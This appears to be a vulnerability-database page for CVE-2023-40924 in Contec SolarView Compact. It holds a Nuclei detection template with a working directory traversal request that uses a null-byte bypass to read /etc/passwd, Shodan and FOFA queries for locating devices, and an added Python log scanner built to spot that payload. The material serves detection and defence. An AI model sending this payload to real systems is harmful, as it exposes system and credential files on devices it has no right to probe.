| Title | Published | Family |
|---|---|---|
| CVE-2023-40924 | 8 Sep 2023 13:15 | attackerkb |
| CVE-2023-40924 | 8 Sep 2023 16:19 | circl |
| Contec SolarView Compact Path Traversal Vulnerability | 8 Sep 2023 00:00 | cnnvd |
| CVE-2023-40924 | 8 Sep 2023 00:00 | cve |
| CVE-2023-40924 | 8 Sep 2023 00:00 | cvelist |
| EUVD-2023-45463 | 3 Oct 2025 20:07 | euvd |
| CVE-2023-40924 | 8 Sep 2023 13:15 | nvd |
| CVE-2023-40924 | 8 Sep 2023 13:15 | osv |
| Directory traversal | 8 Sep 2023 13:15 | prion |
| PT-2023-27704 | 8 Sep 2023 00:00 | ptsecurity |
```yaml
id: CVE-2023-40924

info:
  name: SolarView Compact < 6.00 - Directory Traversal
  author: DhiyaneshDk
  severity: high
  description: |
    SolarView Compact before version 6.00 is vulnerable to directory traversal via the file parameter in downloader.php. An unauthenticated attacker can read arbitrary files from the system by using path traversal sequences with a null byte bypass to access sensitive files such as /etc/passwd.
  impact: |
    An attacker can read sensitive system files including /etc/passwd which may contain password hashes on embedded devices, potentially leading to full system compromise.
  remediation: |
    Upgrade SolarView Compact to version 6.00 or later.
  reference:
    - https://github.com/Yobing1/CVE-2023-40924/blob/main/README.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-40924
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-40924
    epss-score: 0.02885
    epss-percentile: 0.85148
    cwe-id: CWE-22
    cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: contec
    product: solarview_compact_firmware
    shodan-query:
      - http.html:"SolarView Compact"
      - http.favicon.hash:"-244067125"
      - http.html:"solarview compact"
    fofa-query:
      - body="solarview compact"
      - icon_hash="-244067125"
  tags: cve,cve2023,lfi,solarview,contec,traversal,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/downloader.php?file=../../../../../../../../../../etc/passwd%00.jpg"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c66bba0036a4e1f0324895ed121247907f5e788e2f3db6d8408f47ca68f8444a022100e418cda3e8e6c23ba55d5b530f30589ae3c11d6632608f107f067b1bc58c4625:922c64590222798bb761d5b6d8e72950
```
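As an added example (not part of the Vulners page or the Nuclei project), a defender-side Python check that scans access-log lines for downloader.php requests carrying the two indicators the template above relies on: dot-dot traversal in the `file` parameter and a null byte used to bypass an extension check. The log lines, the IP addresses and the double-encoded variant are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (not from the page); line 2 mirrors the template's request,
# line 4 is a double-encoded variant that shows why decoding must be repeated.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Sep/2023:13:15:01 +0000] "GET /index.php HTTP/1.1" 200 1823
203.0.113.7 - - [08/Sep/2023:13:15:09 +0000] "GET /downloader.php?file=../../../../../../../../../../etc/passwd%00.jpg HTTP/1.1" 200 1044
203.0.113.9 - - [08/Sep/2023:13:16:30 +0000] "GET /downloader.php?file=report.csv HTTP/1.1" 200 5120
203.0.113.11 - - [08/Sep/2023:13:17:02 +0000] "GET /downloader.php?file=%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 210
"""
# Common Log Format: client ident user [timestamp] "METHOD target PROTO" status bytes
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable so %252e-style double encoding is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def traversal_indicators(param_value: str) -> list[str]:
    """Reasons a downloader.php 'file' value looks like CWE-22 abuse (empty if clean)."""
    decoded = decode_fully(param_value)
    reasons = []
    if "../" in decoded or "..\\" in decoded:
        reasons.append("dot-dot traversal")
    if "\x00" in decoded:
        reasons.append("null byte (extension-check bypass)")
    return reasons

def scan_access_log(log_text: str) -> list[dict]:
    """Flag downloader.php requests whose 'file' parameter carries traversal indicators."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith("/downloader.php"):
            continue
        # parse_qs already performs one round of percent-decoding (so %00 becomes NUL here)
        for value in parse_qs(url.query, keep_blank_values=True).get("file", []):
            reasons = traversal_indicators(value)
            if reasons:
                findings.append({"ip": m["ip"], "status": int(m["status"]), "file": value,
                                 "reasons": reasons, "likely_success": m["status"] == "200"})
    return findings
```

A flagged request that returned HTTP 200 is the same condition the template's status matcher keys on, so `likely_success` is the finding to triage first.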